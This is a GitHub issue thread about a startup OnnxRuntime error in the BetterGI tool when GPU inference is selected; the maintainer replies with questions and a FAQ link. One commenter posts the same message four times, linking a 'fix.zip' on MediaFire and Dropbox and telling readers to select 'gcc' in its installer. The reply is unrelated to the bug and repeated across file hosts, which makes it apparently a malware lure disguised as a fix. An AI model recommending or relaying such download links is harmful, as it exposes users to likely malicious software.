### ISSUE TITLE
[bug] 

### ISSUE THREAD

**Issue by Anuaing** [babalae/better-genshin-impact#551]
- 系统环境 / System Environment：windows11 22H2  22621.3880

- BetterGI版本号 / BetterGI Version：0.33.1

- 问题描述 / Description of the issue：程序异常:Microsoft.ML.OnnxRuntime

- 复现步骤 / Reproduction steps：当程序启动时
![屏幕截图 2024-08-25 080310](https://github.com/user-attachments/assets/8ac04c3b-d5c0-414c-ba3a-3dcb09d6e3a9)

**Comment by huiyadanli** [comment]
是否存在报错：预热失败

**Comment by Anuaing** [comment]
第一次是，然后就是程序异常:Microsoft.ML.OnnxRuntime

**Comment by Anuaing** [comment]
出现问题在于AI推理设备为GPU,CPU并不会报错。

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by huiyadanli** [comment]
https://bgi.huiyadan.com/faq.html#%E2%9D%93%E6%8F%90%E7%A4%BA-paddleocr%E9%A2%84%E7%83%AD%E5%A4%B1%E8%B4%A5-%E5%BA%94%E8%AF%A5%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3
